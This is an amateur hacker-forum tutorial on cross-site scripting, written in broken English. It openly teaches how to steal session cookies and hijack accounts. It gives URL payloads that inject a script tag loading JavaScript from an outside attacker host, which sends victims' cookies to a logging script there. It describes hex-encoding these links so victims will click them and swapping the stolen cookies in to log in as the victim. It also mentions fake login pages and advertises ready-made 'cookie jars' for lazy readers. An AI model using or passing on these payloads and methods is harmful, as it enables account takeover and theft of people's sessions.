XSS tut

by vol

well what is a xss attack well this is the art of runing scrips in ur victoms pc
you can allmost run any script in ther broswer with the right knowlge the most
ideas xss is used for stealing cookies
the cookies are bits of infomation used by web servers / web sites to check who
u are on on that site
if your a gest it will set a cookie saying ur a gest when u login it will replac
e that cookie with ur cookie that you loged in with taht will have ur login id ,
sometimes if its a forum ur password encrpted in md5 hash
and other stuff what the site can think of useing to make sure u are who u say u
are
like session id's what exspire after a time limit what the server sets like 10 m
ins or 60 mins
well in the cookie it has sections that are named so when the server checks who
you are
it will read bits of data like the ID and the md5 hash if its a forum most
of the time a forum will be useing the cookie prefix as defult like
nukeevo_ID and so on but the forum admin can change that .
Whats a user id? well this if you are the first to sign up to a forum ur id will
be ONE because you
will be the first in the sql table ... i will talk about the sql tables latter.
the admin account is
nearly allmost all the time ID 1 or 2 because of corse he wud of had to make the
account first
to config the forum now when looking for this type of attack the is ways looking
for this type of attack
first geting the hacker point of view of this is to run that script no matter wh
at looking at every way
he or she can find on myspace the was useing flash files to not steal cookies be
cause myspace filter
java script but insted rederecting to a fake login page the files for this can b
e found in downloads.
that was useing .swf files but the newist one for myspace is useing .mov files t
his is useing quicktime files
to get a url what wud be to your fake log in a good FREE server to host to run p
hp files is
www.php1h.com you wold upload your cookie stealing scripts on taht server so you
can send the users cookie
to that site and view it in the log.
ok how you cud set it up wud be
http://evilhacker.php1h.com/cookiestealer.php = this is the back bone it takes t
he cookie from the java script we run called XSS.js
http://evilhacker.php1h.com/log.php
= this is the log wher the cookie will be
sent after the cookiestealer has sent it to the log
www.evilhacker.php1h.com/xss.js
kie to the cookiestealer.php

= this is the java script that gives the coo

: finidng xss attacks :

well the first way will be viewing the site and looking around for any input box
's and then viewing the sorce of that site for the name of the input

box we find a xss exspoit in when looking for a xss u need to make sure that
u look at the url in the URLbar and u mite see stuff that look like
www.site.com/blah.html or .php or .cfm or .jsp ..
make sure it has the full url and if it has stuff after a ? mark add it at the e
nd of the url like this by useing a &
www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script) so if the input box was
called milk for someresion i dono why but just for this tut lets say that.and t
hat the script will just print the words Xss on screen.
www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script>
the is "> because it tells the input box to stop reading ther and then it runs t
he java script
and if the input box was called cat it wud look like this
www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script>
so go round a site looking for any type of input box's some times i find if a si
te has
send to a friend that email box some times works.
after u found it like u get a pop up with the words Xss in it then u will view s
orce and look for the words XSs in a input box the basic synax for how it will l
ook like is
<input type="hidden" name="milk" value="" />
you see and from ther you will make the url
what i will talk about at the end so after finding that a xss and ur able 2 run
it in ur broswer
you wont to start runing the cookie grabing scripts in ur broswer they will look
like this
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.
js"></script>
if u sent some one that link in a email or on msn it wud run in ther broswer
to execute that java script to steal ther cookies from site.com so if you found
a xss in msn.com
you wold have the cookies from msn.com
but you mite ask your self how do i swap my cookies ? well if you are useing fir
efox the is a add on u can install called cookie editer and
then you can edit your cookies or useing IE im sure you can edit them in interne
t temp files or somethink but your best bet is FF(firefox)
just remeber when u steal the cookies thay all wont be one long string thay shud
be broken up in 2 names like UID,others....out ther but u will just have
to work that out for your self
sending the link to a victom can be hard work sometimes if some one sent you a l
ink that looked like this :
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.
js"></script>
i wudnt click it
but :P if u encrpted some of the words in that url in to hex like this
useing this table :
[img]http://62.31.49.95/asciifull.gif[/img]
you cud encrpt it to look sometink like this
%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E
= is the script encoded in hex
wud u click that insted and to send it throght msn you mite wont to add a nother

& at the end and fill it with shit

like
www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript src=%22%http://evilhacker.php1h
.com/xss.js%22>3E%3C/script%3E&mk=12<that wud just make it think it needs to inc
lude the link the full of it the is other ways like useing .gif images to run th
e script on the site but thats a nother story.
well thats it for now hope you injoyed the read
VOl :v60-hackers:
:info:
i have set up some cookie jars for the people to lazzy
http://v60.php1h.com/cookiejar/xss.js
http://v60.php1h.com/cookiejar/log.php
happy hijacking